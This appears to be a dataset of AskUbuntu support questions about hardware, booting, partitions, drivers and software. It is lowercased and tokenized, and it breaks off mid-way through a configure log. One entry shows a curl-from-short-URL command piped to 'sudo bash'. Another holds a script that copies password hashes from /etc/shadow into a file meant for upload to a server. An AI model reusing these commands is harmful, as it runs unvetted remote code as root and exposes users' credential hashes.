383938	hp/compaq 6530b cpu fan goes to 100 % after wakeup from suspend	i recently installed 12.04 lts x64 on my old laptop . works great , but whenever i shut the laptop lid , it goes into suspend , and when i open it back up to use the machine again , the fan goes to 100 % . i 've tried lm-sensors and fancontrol ; those wo n't work for me because my fans/motherboard do n't report back pulse-width modulation ... thus no adjusting the fan speed . the temps are nominal at roughly 36 c. this problem did not exist on windows 7 or 8 , which the machine ran before retirement and installation of ubuntu . the only way to get the fan to turn back down is to reboot the machine . it 's an annoyance , and if i did n't have to run ubuntu for a few school projects , it 'd probably get wiped an another distro would be tried . any help would be appreciated .
383941	ubuntu telling me i need more space	ok , i downloaded ubuntu 13.10 , for a emachines g640 with 64-bit amd-processor , making it dual-boot with windows 7 with a usb not cd . did n't had problem installing it , booted nicely into ubuntu but when i transferred some files from my 1tb external-hdd , to my pcs 320gb hard-drive , i got the error message saying `` there is only 103,3 gb space left '' and told me to `` delete some files to get more space '' . what 's the problem , and how do i fix it ? is it the partition ? the os ? my pc ? edit : right , a friend of mine said it is the partition , and i should extend the ubuntu partition , because he says it 's only 20gb out of the 320gb hard-drive , and he does n't know how to do that . help . the partitions are set up like this . disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0xc615c615 device boot start end blocks id system /dev/sda1 2048 27650047 13824000 27 hidden ntfs winre /dev/sda2 * 27650048 27854847 102400 7 hpfs/ntfs/exfat /dev/sda3 27854848 580299634 276222393+ 7 hpfs/ntfs/exfat /dev/sda4 580302846 625141759 22419457 5 extended partition 4 does not start on physical sector boundary . /dev/sda5 580302848 619380735 19538944 83 linux /dev/sda6 619382784 625141759 2879488 82 linux swap / solaris disc usage filesystem size used avail use % mounted on /dev/sda5 19g 18g 0 100 % / none 4,0k 0 4,0k 0 % /sys/fs/cgroup udev 1,4g 4,0k 1,4g 1 % /dev tmpfs 276m 1,2m 275m 1 % /run none 5,0m 0 5,0m 0 % /run/lock none 1,4g 156k 1,4g 1 % /run/shm none 100m 40k 100m 1 % /run/user thanks , dash_plus_java for the instructions you gave me . it really helped me out a lot . hoof-pump / )
383942	hdmi sound output	hello i just built my first computer and it works fantastic all except for no sound from my hdmi output . i was wondering if this is perhaps a driver issue or when i built the computer i chose hd audio rather than ac 97 . hopefully it is an easy enough solution . thanks
383943	what is the best way to get ubuntu work on my new laptop	i am going to buy a new laptop , and my old laptop is runing ubuntu 13.10 x64 and win7 , can i just replace the hard disk from old laptop to the new laptop ? can ubuntu automatically recognize the new hardware ? thanks ,
383944	ca n't connect asus memo pad hd 7 through mtp on ubuntu 13.10 64bits	i just bought an asus memo pad hd 7 tablet ( running on android 4.2.1 ) and i 'm having some issues connecting it to my computer running on ubuntu 13.10 64 bits . i think i have the latest libmtp ( 1.1.6-2 ) and mtp-detect gives me this : unable to open ~/.mtpz-data for reading , mtpz disabled.libmtp version : 1.1.6 listing raw device ( s ) device 0 ( vid=0b05 and pid=5410 ) is unknown . please report this vid/pid and the device model to the libmtp development team found 1 device ( s ) : 0b05:5410 @ bus 1 , dev 11 attempting to connect device ( s ) android device detected , assigning default bug flags usb low-level info : bcdusb : 512 bdeviceclass : 0 bdevicesubclass : 0 bdeviceprotocol : 0 idvendor : 0b05 idproduct : 5410 in endpoint maxpacket : 512 bytes out endpoint maxpacket : 512 bytes raw device info : bus location : 1 device number : 11 device entry info : vendor : ( null ) vendor id : 0x0b05 product : ( null ) vendor id : 0x5410 device flags : 0x08008106 configuration 0 , interface 0 , altsetting 0 : interface description contains the string `` mtp '' device recognized as mtp , no further probing . device info : manufacturer : asus model : me173x device version : 1.0 serial number : d7okcy230721 vendor extension id : 0x00000006 vendor extension description : microsoft.com : 1.0 ; android.com : 1.0 ; detected object size : 64 bits extensions : microsoft.com : 1.0 android.com : 1.0 it seems the device is more or less recognized ( at least , it sees it is connected ) , but it does n't appear in unity or nautilus . i 'm not really at ease with mounting and unmounting devices manually through the terminal so i 'm still trying to search for a way to integrate it within unity/nautilus . cheers edit : i 've tested it with gmtp and it works , so apparently it 's a problem of integrating it within the os file manager edit : i took a look at src/music-players.h in libmtp and the device should be recognized as : { `` asus '' , 0x0b05 , `` memo me173x ( mtp ) '' , 0x5410 , device_flags_android_bugs } , i 've reported a bug to the dev team , but if someone has a solution in the meantime , i 'll gladly take it : ) .
383945	on which hard-drive is the home folder ? ( using a usb boot disk )	first time using linux/ubuntu , so pardon the noobiness . i created a boot disk and booted from it using the 'try ' method . i 've barely done anything and i 'm getting error messages stating that i have low disk space ( on the desktop/home folder ) . afaik , i have no real disk space issues so i presume it 's some kind of partitioning matter ( though i really do n't know ) . when i try to trace back directories on the home folder - i ca n't get beyond `` file system '' or `` home '' , and when i try to get some indication from gparted i can not find any drive labeled 'home ' or the like . how do i find where the home folder is located ? how can i re-partition it or somehow increase its potential size ? this is driving me absolutely nuts . thank you to anyone who can help .
383946	juju openstack bundle	machine configuration : dell r900 32gb ram , 4 quad core @ 2.4 ( 16 cores ) 1 virtual drive configured 500 gb my question for the day is i am deploying the openstack bundle with juju using 12.04 lts . when deploying a bundle are the relationships expected to be established when its done , and the right services exposed ?
383947	my display is n't working	so i installed ubuntu 13.04 by accident , and it would go to a black screen after logon . so i went and installed 12.04 over it . now whenever i boot , my monitor says can not use display mode , and after about a minute , boots to the login screen . this would be fine , however my computer freezes at the login then goes into extreme graphical glitching in which i can not do anything . this is on a desktop with an amd x64 processor , 3 gigs of ram , and and a nvidia 610. i got the 32 bit version of both oses edit : i swapped graphics cards with another computer and it works .
383952	keyboard backlight problem on asus ux32vd	i have running ubuntu 12.04 with kernel 3.8 i have tried many suggestions , although , the backlight is still not working . if i try to use the most simple solution : echo | sudo tee /sys/class/leds/asus : :kbd_backlight/brightness i get the following message : tee : /sys/class/leds/asus : :kbd_backlight/brightness : no such file or directory : ls /sys/class/leds/ phy0-led thats all i have . any kind of help is very much appreciated !
383953	asus x550ca-xx275h driver problems	i am completely new to ubuntu and linux . i installed everything fast and easy , but i do not know what to do about drivers . i get messages about my graphics card drivers being out of date etc on ubuntu , but i do not know where to find the linux asus version of intel hd 4000 graphics . question : is my laptop viable with abuntu to work properly ( asus x550ca-xx275h ) , and can anyone help guide me on if its possible to get an asus linux version of intel hd 4000 ( even on windows , intel website still sends to asus to get their version of the driver . ) thanks in advance to anyone who can point me in the correct direction !
383954	problem moving windows to other workspaces ( ubuntu 13.10 )	ok , so i had ubuntu 13.04 and i could normaly move windows to other workspaces pressing `` ctrl+alt+shift+any arrow button '' . but i recently upgraded to 13.10 and now , when i press those buttons , i only can move the window to the workspaces at the sides but not the ones below it ( for example : if i have a window in the top left workspace , i can move it to the one on the top right and then get it back to the top left workspace , but i ca n't move it to the bottom left or the bottom right workspace ) and to do that i have to click the workspaces icon ( the one that shows all the workspaces ) and manually drag the window to the workspace i want , and that is quite slow and annoying . is there any way to fix that ? thanks .
383956	after compiling qt 5 how do i to update my system ? with update-alternatives ?	i 'm on ubuntu 12.04 . i followed the instructions in this guide in order to compile qt5 . everything compiled fine . my problem now is that my qt related programs are still pointing to an older version of qt . for example , my qmake was pointing to an older 4.0 version rather than my new 5.0 version . to fix this , i did : sudo update-alternatives -- install /usr/bin/qmake qmake /usr/local/qt-5.2.0/bin/qmake 50 i noticed there are like 30 different programs inside the /usr/local/qt-5.2.0/bin folder . is there a fast way to make sure all of these tools will be found or do i have to do a sudo update-alternatives for all of them one by one ? more importantly , i have a few programs i wish to install that require qt5 . how can i make sure they find the correct libraries , /usr/local/qt-5.2.0/lib ?
383958	libreoffice python uno support for python 2.7 on ubuntu saucy 13.10	i recently upgraded to ubuntu 13.10 and discovered that the python-uno package is no longer available . instead i find a python3-uno package . unfortunately i need python uno libreoffice support for python 2.7 , since i 'm trying to use appy pod ( http : //appyframework.org/pod.html ) , which does not yet support python 3 . any ideas how i can add support to my existing ubuntu packages or is there a ppa or something i can get a version of libreoffice which does have support for python 2.7 ?
383959	i can not install from cd or usb	since the ubuntu iso file is too big for a cd i put it on a dvd but it does not get recognized on boot up . is this because it is a dvd so i need to get a high capacity cd . i figured no sweat i will do a usb install . i used the universal usb installer on a clean 16 gb thumb drive . it boots to a screen saying ubuntu with progress dots and hangs there . on retry i get : kernal panic-not syncing drm_kms_helper -- -switching to text console then it hangs . this happens with either my original drive with a corrupted windows 7 installed or a new blank ssd . any suggestions .
383960	where is firefox 's plugins directory ?	i know that there are extensive , `` proper '' methods for installing firefox plugins . however , i would like to know where the folder is for linking shared-object ( .so ) files , such as libnpjp2.so and libflashplayer.so so that i can install plugins the `` old-fashioned '' way . in firefox 21 , i would have put it in ~/.mozilla/firefox/* [ profile name ] .default/browser/plugins but that folder is no longer there . it keeps jumping around as firefox changes . in about : plugins i still see all the plugins that i would have put there . can anyone tell me where the folder is ? i already checked the folders in /usr/lib/firefox and /usr/lib/mozilla .
383964	too many desktop enviroments	so i have had ubuntu for a very long time and am a very curious person . recently i installed lxde . lxde worked out fine , i 'm actually using it right now and am loving it . but , at the login screen , when you click the circle to choose your environment , unity , or default , or ubuntu is n't there . i think i may have too many .
383971	connect to checkpoint vpn with ubuntu 13.10	my company uses a couple of checkpoint vpn 's . with my windows laptop i use endpoint security to connect . for our corporate vpn i can use the snx client in ubuntu to connect . however we also have a more secure division and are bound by compliance restrictions not to use the ssl network extender on that one . so since i have gone through the trouble of locking down my ubuntu machine i want to be able to connect but can not find a vpn client that will connect to checkpoint . i found an article for raccon but it may be a bit beyond my linux skills to setup . any help would be appreciated .
383972	ubuntu builder change gui in desktop chroot	how can i change default gui in the desktop chroot , because when i installed mate . i cant use it in the desktop chroot . again and again start unity . please how can i change it ?
383977	i ca n't boot into windows anymore !	a few weeks ago i set my computer up to dual boot ubuntu 13.10 and windows 7 pro . everything worked fine , but i found the hassle of switching between oss annoying . since i prefer windows 7 i decided to get rid of ubuntu . of course , since i 'm such a lazy , stupid person i thought `` i 'm sure if i just delete the partition that i download ubuntu on everything will just magically work like it use to . '' so i went into the partition manager for windows , deleted the ubuntu partition , and merged the deleted partition to my files partition . ladedadeda , everything was working fine . i go to restart for updates , lo and behold i ca n't boot into windows ! i 'm pretty decent at troubleshooting and so my first thought was to start searching for a way to fix my problem online . my first attempt at solving the problem was reinstall ubuntu and set up dual-boot again . unfortunately , every option i was given at the grub worked except windows 7 , and i got the message `` error : efi file path not valid '' . well , at least i can use ubuntu on my computer now . my second attempt at to solve the problem was to download boot-repair and execute the program . this did n't do much other than give me the error , invalid arch independent elf magic when ever i tried to boot into windows 7 . it also did n't get rid of the previous error message either . thirdly , i went to create a liveusb windows repair disc to fix the mbr and set partition 1 ( system reserve for windows ) to active . i was able to run the repair disk , but it did n't change anything . then i come across some advice suggesting that i should re-reinstall ubuntu , just in case i the grub is in efi mode instead of bios or something along the lines of that . anyway , i go to do that using the same usb flash drive i used before to install ubuntu and wiped to create the windows 7 repair disk and of course my usb flash drive just is n't being recognized as a usb flash drive or a drive at all by the software . interestingly enough , ubuntu still recognizes it , and i can reformat and wipe it ( which i 've done several times ) and move/copy/paste files to and from it . after hours of troubleshooting and looking up guides , i still ca n't solve this problem . if anyone could fix this problem i 'd greatly appreciate it . and finally , if you need any further details go ahead and ask . p.s . i 'm expecting a ssd for xmas so i might just find a copy of windows 7 , install it on that , and have all my files/media on my hdd , if that works . p.p.s . is it just me or does it look like there is hardly any space between periods and the following character ?
383981	c720 install problem - unable to check grub box	i have run the , curl -l -o http : //goo.gl/9gschs sudo bash 9gschs i get to the screen that asks to check on of the partitions for boot grub.but no key on the keyboard allows me to check the box . help pls or tell me how to install a usable version of ubuntu so my kid can load minecraft.this is far more invovled than i expected .
383983	loading ubuntu onto to a corrupted windows 8	i bought a new samsung laptop with windows 8 and promptly corrupted it by turning it off manually ( not using shutdown ) because i was getting automatic updates ub a foreign language that i did not want . i want to install ubuntu 12 and not use windows 8 . when i start windows 8 goes immediately to repair . i tried booting and holding down the f12 key but it still went to repair . what do i need to do to install ubuntu ?
383985	how can my connection persist even when i suspend ?	using ubuntu 12.04 with all updates ; since yesterday everytime my computer goes to suspend somehow my internet connection is lost how it 's supposed to be but it attemps to connect every single minute causing for example pidgin to excess flood every single irc room i am in . so in resume , how can my connection persist even if my machine goes to suspend ? thanks .
383987	high vram memory unity/compiz with nvidia	i run my desktop at the high resolution of 1920x1200 and am finding the vram usage is very high ; nearly all my graphics memory ( ~200-220mb used ) . i 'm checking my vram usage with the nvidia xserver settings app . this would n't be an issue except when i run games , such as half life 2 , then can suddenly slow to a crawl as the video memory is used up . if i run the games using a different desktop environment , like lxde , everything runs fun ( not as fast as windows , but much better ! ) i have an nvidia quadro 570m ( same as the geforce fx 8600m i think . ) this is with the ubuntu 13.10 and 12.04 and the default proprietary drivers or the latest ( 331.20 ) , plus some of the older ones , the result is the same . is there some setting i 'm missing to free up the memory when another app is opened full screen ? or is this a known bug ? it seems a huge amount of vram to use just for the desktop . my question is similar to this one i think : improving steam performance on ubuntu 13.04 with nvidia thanks !
383992	help booting into windows 8	so recently i installed ubuntu alongside windows 8 . i tried out ubuntu and soon tried to go back to windows 8 . at first it said something about the efi . i then ran the boot repair . the efi error is gone but now there is a new error that says disk hd0 , gpt4 not found . i really need to get into windows but ca n't . will someone please help me ?
383997	how to open text , video , or picture files via terminal	i am new to ubuntu and i would like to know how to open a simple text file or open a video or a picture via the terminal
383998	how to safely move/remove efi partition	my laptop came with win 8 preinstalled . when i installed ubuntu originally , i had the guided install wipe out windows for a ubuntu-only system . however , this ignored my ssd and installed only to the hdd . i am now reinstalling ubuntu on the ssd ( with ~/music , ~/photos , ~/downloads , and ~/videos remaining on the hdd and symlinked from home ) . when i formatted the ssd , i created a 200mb efi partition , a 4gb swap , and a ~28gb root partition . however , the new installation is ignoring the new efi partition and using the 500mb efi partition on the hdd , presumably left over from windows 8 . can i simply remove the efi partition from the hdd , or do i need to take additional steps to maintain a usable system ?
384002	lshw and lspci can not find ethernet device	i have an asus h87m-plus motherboard . this board comes ( according to manual ) with a realtek 8111g ethernet device . in the bios , the ethernet device is enabled . yet , linux does not find a single trace of this device . # lshw -c network *-network description : wireless interface product : rtl8188ce 802.11b/g/n wifi adapter vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:06:00.0 logical name : wlan0 version : 01 serial : 74 : d0:2b : dd : f5:4d width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rtl8192ce driverversion=3.11.0-13-generic firmware=n/a ip=10.0.1.5 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:16 ioport : e000 ( size=256 ) memory : f7c00000-f7c03fff and : # lspci 00:00.0 host bridge : intel corporation 4th gen core processor dram controller ( rev 06 ) 00:01.0 pci bridge : intel corporation xeon e3-1200 v3/4th gen core processor pci express x16 controller ( rev 06 ) 00:02.0 vga compatible controller : intel corporation xeon e3-1200 v3/4th gen core processor integrated graphics controller ( rev 06 ) 00:03.0 audio device : intel corporation xeon e3-1200 v3/4th gen core processor hd audio controller ( rev 06 ) 00:14.0 usb controller : intel corporation 8 series/c220 series chipset family usb xhci ( rev 04 ) 00:16.0 communication controller : intel corporation 8 series/c220 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 8 series/c220 series chipset family usb ehci # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 8 series/c220 series chipset high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 1 ( rev d4 ) 00:1c.2 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 3 ( rev d4 ) 00:1c.3 pci bridge : intel corporation 82801 pci bridge ( rev d4 ) 00:1c.4 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 5 ( rev d4 ) 00:1d.0 usb controller : intel corporation 8 series/c220 series chipset family usb ehci # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation h87 express lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 8 series/c220 series chipset family 6-port sata controller 1 [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 8 series/c220 series chipset family smbus controller ( rev 04 ) 04:00.0 pci bridge : asmedia technology inc. asm1083/1085 pcie to pci bridge ( rev 03 ) 06:00.0 network controller : realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter ( rev 01 ) note : the last entry is the wifi card , not the missing wired ethernet device . i tried building the r8168 kernel module from realtek 's website . after building and inserting , nothing shows up in the kernel log . neither does the device . why is there no trace of my network device ?
384006	are there are alts to yumi multiboot creator tool for ubuntu 12.04 ?	i downloaded the .deb file for yumi from the pendrive website and went the software center opens the file , it says it cant install because the dependencies are not satisfiable : gambus3-runtime . it tried to install it but its not it the default respositories .
384010	how to delete my user account	i forgot my user account password and i need to either delete it or reset the password . i have tried everything i could have used and i am out of ideas . also , i do n't have any backup as i do n't use ubuntu very much . any help will be appreciated .
384014	wifi connects to network , but can not connect to internet	i am unable to connect to the internet with ubuntu 12.04.3 . the windows 8.1 partition however can access my wifi perfectly . from what i 've managed to gather my adapter is not being assigned an ipv4 address and can not ping the router . running dhclient did not work . curiously i am able to connect and search with google through the wifi however no other websites work . a wired connection seems to work the majority if the time . details : adapter : intel wireless-n 7260 os : ubuntu 12.04.3 w/ kernel 3.12.2 nm-tool output : https : //gist.github.com/bloxgate/7715106 dmesg output : http : //paste.ubuntu.com/6502541/ if you need more info please ask .
384017	bootable ubuntu 12.10 but can not download	finally was able to actually have my msi motherboard boot the usb drive . the options when i boot from usb is : - try without install -oem install ( for manufactures ) - full install only option that works is to go into the os without any install . then , trying to install once in ubuntu gives me same crash error . what can i do ?
384020	fresh install of 13.10 - left with no dash nor apps - only blank magenta wallpaper	regarding recently installed ubuntu desktop 13.10 ( 40gb hdd and plenty ram ) as a fresh install on an appropriately partitioned hdd . my problem is that once installed everything is blank : no dash , no launcher , no apps , just a blank magenta wallpaper loads . its infuriating because nothing works..i 've tried suggestions on many threads and am pretty new to terminal . as it is right now , its a useless operating system as far as my needs go and i do n't see why it has to be so extremely difficult to install . if this is a duplicate question ( none of the suggested duplicates have this exact question , and the ones that are similar have either no answers or the few answers they do have , have not been successful at fixing my problem ) . so if an exact duplicate is found with workable answers , i 'd really appreciate being pointed in the right direction .
384021	how to convert video files	is there a easy way to convert .mkv files into .avi files with ubuntu ? i have tried downloading apps but none of which seem to work . thanks
384022	how to activate wireless driver in ubuntu server	recently i installed an ubuntu server but i am not able to connect to any of the wifi networks having wpa-psk2 security . i have tried to configure proxy settings using /etc/bash.bashrc , /etc/apt/apt.conf , /etc/environment , /etc/wpa_supplicant.conf but still it says network unreachable . also , on startup it says network configuration fails . how to solve this ?
384023	ubuntu one for windows	i have uploaded folders on ubuntu-one while i was working on ubuntu . i have windows on the same computer and while i tried accessing ubuntu-one through windows , i could not find my uploaded files .
384025	migrating 2-disk raid0 installation to single drive	i currently have ubuntu server 13.10 ( upgraded from 12.10 ) installed on an old dell pc at home . when i set it up , i tossed in 2 1tb drives , and set up raid0 to simplify using all their space . i know this is basically awful , but it 's a media/file server with lots of files that are either backed up elsewhere or easy to replace . anyway , 2tb is approaching being insufficient , and raid0 has me reasonably uncomfortable about the reliability of the system . although important files are backed up , we 've hacked together enough stuff on it in an undocumented way ( again , awful , i know ) that it 'd at very least be unfortunate to lose the system/program/config files . so i 'm getting a new 4tb drive to replace both . ideally , i 'd like to also eventually slot in a second 4tb drive and set up raid1 , when i can afford it , but that 's a secondary goal . however , the pc only has two ports for drives . i also currently do not have any other single drive with sufficient capacity to copy the entire 2tb to intermediately . what is the best way , if any , to transfer my installation to the 4tb drive ? uptime is n't important , just being able to replace the two drives with one larger one while minimizing other system changes .
384027	input still registering through keyboard on ubuntu touch 14.04	while typing i can type but if there is an input field or a cancel button ( my main issue ) , it will select the input behind the keyboard instead of the keyboard key . for example if i try to sign into my email account in the system settings it selects the cancel button when i touch the symbols button on the keyboard . which is my only issue . everything else works great . am i doing something wrong ? or is there a fix ?
384031	why would using one video driver over another cause the os to crash when starting/ending an app ?	when i installed ( fresh ) lubuntu 13.10 , i found that the os crashed when attempting to start firefox , and when leaving abiword . the first thing i would notice was the mouse arrow stopped responding ; then a couple of seconds later , the whole screen went all weird , in a diagonal way . i tried to get to the login terminal , but ... nothing doing . i had to do a hard shutdown ( hold the computer 's on/off button in for 5 seconds ) . in searching for other people who had [ solved ] the problem , i came across `` lubuntu 13.04 freezes when starting firefox '' . in this , it was suggested that the questioner install the latest proprietary nvidia driver , and stop using nouveau . i looked up what driver i was using , and it was nouveau . i installed pkg . nvidia-current , which is at the moment , nvidia-304 ( version 304.88-0ubuntu8 ) , and ... it fixed the problem . now , why would using a different video driver cause an app to crash ( or not to crash ) the os ? and why did it happen at the beginning of firefox , and at the end of abiword ? and why had i suddenly had the problem in the first place ? i had never paid any attention to video drivers , and used whatever the os-install selected , which presumably was always nouveau , and which always worked fine . i am glad ( very ) to have the problem fixed ( and a very big thanks to aditya in the above-mentioned askubuntu page , for indirectly helping me , as well as the original questioner ) , but the solution seems bizarre ... how would anyone have thought of that solution ? -scott
384032	what os software do i need to download to be able to watch netflix ?	i am trying to watch netflix i have chrome , and ubunto 11.04 and i keep getting a system error .
384033	ubuntu software center , terminal and other applications do n't work after uninstalling python	i am a new ubuntu user running ubuntu 13.04 . i 've been trying to install and use a dedrm tool , but i 've been having problems doing so . i was following some directions that said i needed a version of python 2.7 , but not anything python 3.0 or later ( because 3.0 versions are missing some necessary libraries ? ) . i tried to install python 2.7.5.6 , but it did n't work . i thought it was probably because i had the later version of python , so i went through terminal and removed python 3.3 , so i could install the earlier version . but now that i 've uninstalled python 3.3 , a lot of things were removed with it , including terminal and the ubuntu software center . i have no idea how to fix this problem now . i would just take my computer somewhere to have a professional do it , but i live abroad and do n't speak the language here . please , please help me if possible . i would really appreciate any advice on this . if there 's any more information i could provide , please let me know . thanks ,
384042	no wifi connection	i installed ubuntu 12.04 lts in my acer aspire 5741g ( 8gb ram , window 7 ) . after installing ubuntu , i could not connect to wifi . although i dragged down the wifi option , enabled the connection , but i get no connection . i even tried installing a fresh copy , but the problem remains the same . help .
384046	ca n't update , no space left on device	i tried to update but it suggested i use sudo apt-get -f install . i tried using that command , but now it gives me this error : no space left on device below are the results of running : sudo apt-get -f install : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following package was automatically installed and is no longer required : linux-image-3.2.0-32-generic-pae use 'apt-get autoremove ' to remove them . the following extra packages will be installed : linux-generic-pae linux-image-3.2.0-56-generic-pae linux-image-generic-pae suggested packages : fdutils linux-doc-3.2.0 linux-source-3.2.0 linux-tools the following new packages will be installed : linux-image-3.2.0-56-generic-pae the following packages will be upgraded : linux-generic-pae linux-image-generic-pae 2 upgraded , 1 newly installed , 0 to remove and 143 not upgraded . 2 not fully installed or removed . need to get 0 b/38.4 mb of archives . after this operation , 114 mb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 285020 files and directories currently installed . ) unpacking linux-image-3.2.0-56-generic-pae ( from ... /linux-image-3.2.0-56-generic-pae_3.2.0-56.86_i386.deb ) ... done . dpkg : error processing /var/cache/apt/archives/linux-image-3.2.0-56-generic-pae_3.2.0-56.86_i386.deb ( -- unpack ) : failed in write on buffer copy for backend dpkg-deb during `./boot/vmlinuz-3.2.0-56-generic-pae ' : no space left on device no apport report written because the error message indicates a disk full error dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.2.0-56-generic-pae /boot/vmlinuz-3.2.0-56-generic-pae run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.2.0-56-generic-pae /boot/vmlinuz-3.2.0-56-generic-pae errors were encountered while processing : /var/cache/apt/archives/linux-image-3.2.0-56-generic-pae_3.2.0-56.86_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) here are the results of running : df : filesystem 1k-blocks used available use % mounted on /dev/mapper/homeserver-root 26782780 7438068 17984228 30 % / udev 1018508 4 1018504 1 % /dev tmpfs 410436 3248 407188 1 % /run none 5120 0 5120 0 % /run/lock none 1026088 4 1026084 1 % /run/shm /dev/sdb1 2884272344 836176596 1901583060 31 % /media/seagate /dev/sda1 233191 230064 0 100 % /boot i 'm not too familiar with ubuntu . can anyone help fix this for me ?
384049	inotifywait does not shut down my computer	i 've put this script at startup in /etc/init.d , when some user changes password , this script updates it on another file data.txt , it is working fine , but when i shut down my computer it was not doing so showing ubutnu screen at shutting down , n when i shut down it by pressing power button it automatically restarts itself , by removing this script and commenting outer while loop , computer can easily be shut down . here is my code while inotifywait -e attrib /etc/shadow ; do # edit user while ifs= : read -r f1 f2 do user= $ ( sudo grep `` $ f1 '' /etc/shadow | cut -d ' : ' -f 1 ) ; pwd= $ ( sudo grep `` $ f1 '' /etc/shadow | cut -d ' : ' -f 2 ) ; if [ `` $ f2 '' ! = `` $ pwd '' ] ; then # echo `` changed '' ; # search for password , and repalce it with new one sed -i 's @ ' $ f2 ' @ ' $ pwd ' @ ' $ file ; # upload file data.txt to server fi done < $ file # end edit user done please tell me what i 'm doing wrong ?
384050	plugins for banshee/rythmbox for groove shark	what i really would like to know is is there a plugin or app that allows me to use grooveshark sans browser ( eg . in banshee/rythmbox/external app ) i already read this question : any rhythmbox plugin for grooveshark out there ? , but none of the solutions worked . the first answer sites a directory that does n't exist , so that idea fell through , and the second answer sites an app that does n't exist anymore , so that does n't work . is there any way to use grooveshark through banshee or rythmbox ? this is n't a huge deal , just a minor thing that would be nice to have . thanks !
384051	browser does not load certain pages	i installed ubuntu 12.04 and configured for internet access . no issues there . however , my browser ( firefox , chromium ) is not able to load/display certain pages ( mail.yahoo.com , thehindu.com , in.yahoo.com ) after loading the web page title . the browser does not have problem with other sites ( google , msn , ubuntu , etc ... ) . any reason why only certain pages are not loading ?
384056	restore permission and ownersip to root/home folders ?	i have migrated my system to a new hard disk and backed up my system to an external ntfs volume with rsync- ahv , a oversight and mistake given that ntfs volumes do not support unix permissions . normally i would back up to an ext4 volume however this disk has failed . so now i have a backed up system , which i have spent a lot of time tweaking , with all of it 's permissions and ownerships blitzed , and logging into this system is possible ( once i have restored it with rsync and reconfigured grub ) , but problematic to say the least . i need to restore ownerships and permissions to the system . is there a system of chown/chmod i can use to do this ?
384058	wubi to install xubuntu 13.10 ?	is there any wubi that can install xubuntu 13.10 ? i have the wubi to install 13.10 but is there any wubi to install xubuntu 13.10 ? i hope this question has an answer that could help me
384059	error compiling a package : `` configure : error : no gstreamer-1.0 > = 1.0.0 ''	i am trying to compile a package , which requires gstreamer-1.0 > = 1.0.3 . i think i have an older vesion installed on my system . so i downloaded and compiled gstreamer-1.0.4 and it got installed in /usr/local/lib/gstreamer-1.0 . after i did that , i again tried to compile the package but it still gives the same error that i dont have `` gstreamer-1.0 > = 1.0.3 '' . i also tried to export the path '' export ld_library_path=/usr/local/lib/gstreamer-1.0 '' '' whereis gstreamer-1.0 '' outputs gstreamer-1 : /usr/lib64/gstreamer-1.0 /usr/local/lib/gstreamer-1.0 /usr/libexec/gstreamer-1.0 /usr/share/gstreamer-1.0 actual error message checking build system type ... x86_64-unknown-linux-gnu checking host system type ... x86_64-unknown-linux-gnu checking target system type ... x86_64-unknown-linux-gnu checking for a bsd-compatible install ... /bin/install -c checking whether build environment is sane ... yes checking for a thread-safe mkdir -p ... /bin/mkdir -p checking for gawk ... gawk checking whether make sets $ ( make ) ... yes checking how to create a ustar tar archive ... gnutar checking nano version ... 0 ( release ) checking whether to enable maintainer-specific portions of makefiles ... yes checking whether make supports nested variables ... yes checking how to print strings ... printf checking for style of include used by make ... gnu checking for gcc ... gcc checking whether the c compiler works ... yes checking for c compiler default output file name ... a.out checking for suffix of executables ... checking whether we are cross compiling ... no checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether gcc accepts -g ... yes checking for gcc option to accept iso c89 ... none needed checking dependency style of gcc ... gcc3 checking for a sed that does not truncate output ... /bin/sed checking for grep that handles long lines and -e ... /bin/grep checking for egrep ... /bin/grep -e checking for fgrep ... /bin/grep -f checking for ld used by gcc ... /bin/ld checking if the linker ( /bin/ld ) is gnu ld ... yes checking for bsd- or ms-compatible name lister ( nm ) ... /bin/nm -b checking the name lister ( /bin/nm -b ) interface ... bsd nm checking whether ln -s works ... yes checking the maximum length of command line arguments ... 1572864 checking whether the shell understands some xsi constructs ... yes checking whether the shell understands `` += '' ... yes checking how to convert x86_64-unknown-linux-gnu file names to x86_64-unknown-linux-gnu format ... func_convert_file_noop checking how to convert x86_64-unknown-linux-gnu file names to toolchain format ... func_convert_file_noop checking for /bin/ld option to reload object files ... -r checking for objdump ... objdump checking how to recognize dependent libraries ... pass_all checking for dlltool ... no checking how to associate runtime and link libraries ... printf % s\n checking for ar ... ar checking for archiver @ file support ... @ checking for strip ... strip checking for ranlib ... ranlib checking command to parse /bin/nm -b output from gcc object ... ok checking for sysroot ... no checking for mt ... no checking if : is a manifest tool ... no checking how to run the c preprocessor ... gcc -e checking for ansi c header files ... yes checking for sys/types.h ... yes checking for sys/stat.h ... yes checking for stdlib.h ... yes checking for string.h ... yes checking for memory.h ... yes checking for strings.h ... yes checking for inttypes.h ... yes checking for stdint.h ... yes checking for unistd.h ... yes checking for dlfcn.h ... yes checking for objdir ... .libs checking if gcc supports -fno-rtti -fno-exceptions ... no checking for gcc option to produce pic ... -fpic -dpic checking if gcc pic flag -fpic -dpic works ... yes checking if gcc static flag -static works ... no checking if gcc supports -c -o file.o ... 